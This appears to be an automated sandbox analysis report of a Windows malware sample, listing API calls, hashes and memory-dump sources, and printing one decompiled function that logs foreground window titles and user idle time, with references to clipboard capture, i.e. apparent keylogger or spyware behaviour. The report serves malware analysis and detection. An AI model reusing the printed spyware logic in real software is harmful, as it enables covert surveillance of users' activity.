                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B411
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B41D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B426
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B42F
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B43B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B447
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B450
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B459
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B462
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B46B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B474
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@G@std@@$??1?$basic_string@$D@2@@std@@$G@2@@std@@$V?$basic_string@$Hstd@@$?c_str@?$basic_string@$G@2@@0@V10@0@$??0?$basic_string@$D@2@@0@$D@1@@File$G@1@@V10@V10@@$Delete$SleepV01@@rand$??8std@@CreateModuleNameV01@Y?$basic_string@srandtime
                                                                                • String ID: /stext "
                                                                                • API String ID: 1338134179-3856184850
                                                                                • Opcode ID: 4cf9f4f989c1dbc01d5d9bcd63df9e15362e2b1d3a7a2c9d622823351759b808
                                                                                • Instruction ID: be4b94b66ba9b0bd8820f021ae38252d46d58d745cb1822e142cef95b78b0ffe
                                                                                • Opcode Fuzzy Hash: 4cf9f4f989c1dbc01d5d9bcd63df9e15362e2b1d3a7a2c9d622823351759b808
                                                                                • Instruction Fuzzy Hash: 4D02EDB2C0050DEBDB05EBE0EC59EDE7B7CAF54345F04806AF516A3091EB745689CBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004135DE, Relevance: 68.4, APIs: 31, Strings: 8, Instructions: 148COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00413626
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?,WinDir), ref: 0041365D
                                                                                • _wgetenv.MSVCRT ref: 0041366D
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00413678
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00413683
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041368F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413698
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136A1
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136AA
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 004136BE
                                                                                • _wgetenv.MSVCRT ref: 004136CE
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004136D9
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004136E4
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004136F0
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136F9
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413702
                                                                                • _wgetenv.MSVCRT ref: 00413720
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00000000), ref: 0041372B
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000208,0041BCB0), ref: 00413741
                                                                                • GetLongPathNameW.KERNELBASE(00000000), ref: 00413748
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041375A
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415A24,?,00000000), ref: 0041376D
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 00413783
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041378E
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041379A
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137A5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137AE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137B7
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C0
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@G@1@@$??4?$basic_string@G@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@_wgetenv$?c_str@?$basic_string@LongNamePath
                                                                                • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                • API String ID: 1999370131-1609423294
                                                                                • Opcode ID: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                                                                • Instruction ID: 55aa70349295c49f58eee01d6a61984d570a68084dfe302b191afe96af195224
                                                                                • Opcode Fuzzy Hash: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                                                                • Instruction Fuzzy Hash: 4451FCB280150EEBCB05DF90ED59DEEB778EF54345B208066F912E3090EB746B49CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004055E7, Relevance: 54.2, APIs: 36, Instructions: 168sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00002710), ref: 00405607
                                                                                  • Part of subcall function 00405532: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                                                                  • Part of subcall function 00405532: CreateFileW.KERNELBASE(00000000), ref: 00405569
                                                                                  • Part of subcall function 00405532: GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                                                                  • Part of subcall function 00405532: Sleep.KERNEL32(00002710), ref: 004055A7
                                                                                  • Part of subcall function 00405532: FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055AE
                                                                                  • Part of subcall function 00405532: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405619
                                                                                • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 0040562E
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040563F
                                                                                • CreateDirectoryW.KERNELBASE(00000000), ref: 00405646
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00405651
                                                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 00405658
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00405669
                                                                                • SetFileAttributesW.KERNELBASE(00000000), ref: 00405670
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405681
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 00405690
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040569D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056AA
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004056C5
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004056D0
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056DC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004056F0
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 004056F7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405708
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405714
                                                                                  • Part of subcall function 00412DDF: CreateFileW.KERNELBASE(000177DE,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000177DE,?,00409C9F,00000000), ref: 00412DF9
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405729
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040574D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405756
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405733
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                                                                  • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                                                                  • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040575F
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040576F
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405778
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405782
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040579A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004057AA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057BB
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057C4
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 004057D1
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 004057E2
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000006), ref: 004057F1
                                                                                • SetFileAttributesW.KERNEL32(00000000), ref: 004057F8
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$File$??0?$basic_string@$??1?$basic_string@V01@@$?length@?$basic_string@$?data@?$basic_string@AttributesCreateD@1@@V01@$??4?$basic_string@Sleep$??9std@@?empty@?$basic_string@ChangeCloseD@2@@0@DirectoryExistsFindNotificationPathSizeV?$basic_string@Y?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 131886942-0
                                                                                • Opcode ID: b571fdc2b2987a2fb083a929e3f7c3bd83844b6f293879903e95a5d1a9b9994d
                                                                                • Instruction ID: c86808d706488c02b7588af0601caf96bbb35f31f7bc76b7b462248bc21621a9
                                                                                • Opcode Fuzzy Hash: b571fdc2b2987a2fb083a929e3f7c3bd83844b6f293879903e95a5d1a9b9994d
                                                                                • Instruction Fuzzy Hash: B0514E72A00909EBCB05ABA0ED5DADE7B78EF84315F04807AF503A71A0DF745A45CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004059BE, Relevance: 50.9, APIs: 25, Strings: 4, Instructions: 158sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E004059BE(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				intOrPtr _v12;
				signed int _v16;
				char _v28;
				char _v44;
				char _v60;
				char _v76;
				void* _v92;
				intOrPtr _t41;
				struct HWND__* _t42;
				int _t43;
				CHAR* _t45;
				signed int _t48;
				char* _t58;
				char* _t59;
				struct HWND__* _t93;
				intOrPtr _t94;
				void* _t99;
				intOrPtr _t112;

				_v12 = __ecx;
				while(1) {
					_t41 = _v12;
					if( *((intOrPtr*)(_t41 + 0x3c)) == 0 &&  *((intOrPtr*)(_t41 + 0x3d)) == 0) {
						break;
					}
					if(( *0x41b990 & 0x00000001) == 0) {
						 *0x41b990 =  *0x41b990 | 0x00000001;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
						E00413E72(E00405BB5);
					}
					Sleep(0x1f4); // executed
					_t42 = GetForegroundWindow(); // executed
					_t93 = _t42;
					_t43 = GetWindowTextLengthA(_t93);
					_t95 = _t43;
					_t9 = _t95 + 1; // 0x1
					_t45 = _t9;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_t45, 0,  &_v6);
					if(_t43 != 0) {
						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						GetWindowTextA(_t93, _t45, _t45);
						_t58 =  &_v44;
						__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t58, 0x41b998);
						if(_t58 == 0) {
							_t59 =  &_v44;
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t59);
							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
							__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t59 - 1);
							_t112 =  *0x41b93e; // 0x0
							if(_t112 == 0) {
								_t103 = _t99 - 0x10;
								L00414176();
								L00414170();
								_t99 = _t99 - 0x10 + 0x18;
								E004054E9(_v12, _t103,  &_v60,  &_v60, "\r\n[ ",  &_v44);
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(" ]\r\n", 0);
							} else {
								_t99 = _t99 - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
								E00405DD3(_v12,  &_v44);
							}
						}
					}
					_t94 = _v12;
					_t71 = _t94; // executed
					E00406C35(_t94); // executed
					if(E0041269B(_t94) < 0xea60) {
						L16:
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						continue;
					} else {
						while( *((intOrPtr*)(_t94 + 0x3c)) != 0 ||  *((intOrPtr*)(_t94 + 0x3d)) != 0) {
							_t48 = E0041269B(_t71);
							if(_t48 < 0xea60) {
								__imp___itoa(_v16 / 0xea60,  &_v28, 0xa);
								_t101 = _t99 + 0xc - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v28,  &_v7, " minutes }\r\n", 0);
								L00414176();
								L00414170();
								_t99 = _t99 + 0xc - 0x10 + 0x18;
								E004054E9(_t94, _t101,  &_v76,  &_v76, "\r\n{ User has been idle for ",  &_v28);
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
								goto L16;
							}
							_v16 = _t48;
							Sleep(0x3e8);
						}
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						break;
					}
				}
				return 0;
			}
























                                                                                0x004059c7
                                                                                0x004059cc
                                                                                0x004059cc
                                                                                0x004059d2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004059e4
                                                                                0x004059e6
                                                                                0x004059f6
                                                                                0x00405a01
                                                                                0x00405a06
                                                                                0x00405a0c
                                                                                0x00405a12
                                                                                0x00405a18
                                                                                0x00405a1b
                                                                                0x00405a21
                                                                                0x00405a28
                                                                                0x00405a28
                                                                                0x00405a2f
                                                                                0x00405a37
                                                                                0x00405a40
                                                                                0x00405a4a
                                                                                0x00405a52
                                                                                0x00405a58
                                                                                0x00405a61
                                                                                0x00405a6b
                                                                                0x00405a6d
                                                                                0x00405a76
                                                                                0x00405a7f
                                                                                0x00405a8a
                                                                                0x00405a90
                                                                                0x00405a96
                                                                                0x00405ab5
                                                                                0x00405ac9
                                                                                0x00405ad3
                                                                                0x00405adb
                                                                                0x00405ade
                                                                                0x00405ae6
                                                                                0x00405a98
                                                                                0x00405a98
                                                                                0x00405aa1
                                                                                0x00405aaa
                                                                                0x00405aaa
                                                                                0x00405a96
                                                                                0x00405a6b
                                                                                0x00405aec
                                                                                0x00405aef
                                                                                0x00405af1
                                                                                0x00405b02
                                                                                0x00405b97
                                                                                0x00405b9a
                                                                                0x00000000
                                                                                0x00405b08
                                                                                0x00405b08
                                                                                0x00405b16
                                                                                0x00405b1d
                                                                                0x00405b3d
                                                                                0x00405b4d
                                                                                0x00405b5c
                                                                                0x00405b6c
                                                                                0x00405b76
                                                                                0x00405b7b
                                                                                0x00405b80
                                                                                0x00405b88
                                                                                0x00405b91
                                                                                0x00000000
                                                                                0x00405b91
                                                                                0x00405b24
                                                                                0x00405b27
                                                                                0x00405b27
                                                                                0x00405ba8
                                                                                0x00000000
                                                                                0x00405ba8
                                                                                0x00405b02
                                                                                0x00405bb4

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004059F6
                                                                                • Sleep.KERNELBASE(000001F4), ref: 00405A0C
                                                                                • GetForegroundWindow.USER32 ref: 00405A12
                                                                                • GetWindowTextLengthA.USER32(00000000), ref: 00405A1B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 00405A2F
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A40
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405A4A
                                                                                • GetWindowTextA.USER32 ref: 00405A52
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B998), ref: 00405A61
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00405A76
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A7F
                                                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00405A8A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405AA1
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,?, ],?,?,00000000), ref: 00405AC9
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ],?,?,00000000), ref: 00405AD3
                                                                                  • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                                                                  • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                                                                  • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                                                                  • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405AE6
                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?, ],?,?,00000000), ref: 00405B27
                                                                                • _itoa.MSVCRT ref: 00405B3D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B5C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B6C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405B76
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B88
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B91
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B9A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405BA8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@$D@1@@V01@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                                                                • String ID: [ ${ User has been idle for $ ]$ minutes }
                                                                                • API String ID: 615312007-3343415809
                                                                                • Opcode ID: b2b161cc20482a4f6dfc5dc17bce99b28862113886b793a756a1a3e48b86c345
                                                                                • Instruction ID: 24516c956339191e20f1f3c27382aafae9a0e704c06eebb7e5bf761840e1d674
                                                                                • Opcode Fuzzy Hash: b2b161cc20482a4f6dfc5dc17bce99b28862113886b793a756a1a3e48b86c345
                                                                                • Instruction Fuzzy Hash: CC517072900609EBCB00EBA0DC899EF7F78EF44315F04407AE502E7191EB785989CFA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040221E, Relevance: 43.7, APIs: 29, Instructions: 151synchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
